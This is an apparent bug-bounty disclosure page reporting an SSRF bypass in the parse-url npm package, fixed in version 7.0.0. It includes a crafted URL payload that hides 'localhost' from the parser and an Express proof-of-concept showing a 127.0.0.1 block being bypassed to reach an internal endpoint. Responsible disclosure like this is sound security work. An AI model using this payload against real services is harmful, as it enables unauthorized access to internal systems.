SSRF via Improper Input Validation in ionicabizau/parse-url

Valid

Reported on

Jun 17th 2022

Description

Hostname is not detected because of improper handling of username and password. (Based on real cases)

Proof of Concept

❯ node -e 'const parseUrl = require("parse-url"); console.log(parseUrl("http://google:com:@@localhost"))'
{
  protocols: [ 'http' ],
  protocol: 'http',
  port: null,
  resource: 'google:com:@@localhost',
  user: '',
  pathname: '',
  hash: '',
  search: '',
  href: 'http://google:com:@@localhost',
  query: [Object: null prototype] {}
}

When receiving the above URL, the hostname is localhost, but it is not detected.

const parseUrl = require("parse-url");
const express = require('express');
const http = require('http');
const app = express();

const isLocal = () => (req, res, next) => (req.connection.remoteAddress === '::ffff:127.0.0.1'|| req.connection.remoteAddress === '::1' ? true:false)
    ? next()
    : res.json({'state':'You\'re not locally'});

parsed = parseUrl("http://google:com:@@127.0.0.1:9999/ssrf_check");
console.log(parsed);

app.get('/', (req, res) => {
    if(parsed.resource == '127.0.0.1'){
        res.send('Not good');
    } else{
        http.get(parsed.href)
        res.send('Good');
    }
});

app.get('/ssrf_check', isLocal(), (req, res) =>{
    console.log('ssrf bypass');
    res.send(true);
});

app.listen(9999);

The above PoC code forbids the use of 127.0.0.1 host. However, by using the above vulnerability, it is possible to bypass this and perform an SSRF attack.

Impact

Bypass hostname check (SSRF)

We are processing your report and will contact the ionicabizau/parse-url team within 24 hours. a year ago
Pocas modified the report
a year ago
Pocas modified the report
a year ago
Pocas
a year ago

Researcher

❯ node -e "const parser = require('url-parse');console.log(parser('http://google:com:@@asdf'))"
{
  slashes: true,
  protocol: 'http:',
  hash: '',
  query: '',
  pathname: '/',
  auth: 'google:com%3A%40',
  host: 'asdf',
  port: '',
  hostname: 'asdf',
  password: 'com%3A%40',
  username: 'google',
  origin: 'http://asdf',
  href: 'http://google:com%3A%40@asdf/'
}
We have contacted a member of the ionicabizau/parse-url team and are waiting to hear back a year ago
We have sent a follow up to the ionicabizau/parse-url team. We will try again in 7 days. a year ago
Ionică
a year ago

Maintainer

Thank you for this finding!

Ionică Bizău (Johnny B.) validated this vulnerability a year ago
Pocas has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Ionică Bizău (Johnny B.) marked this as fixed in 7.0.0 with commit 21c72a a year ago
Ionică Bizău (Johnny B.) has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation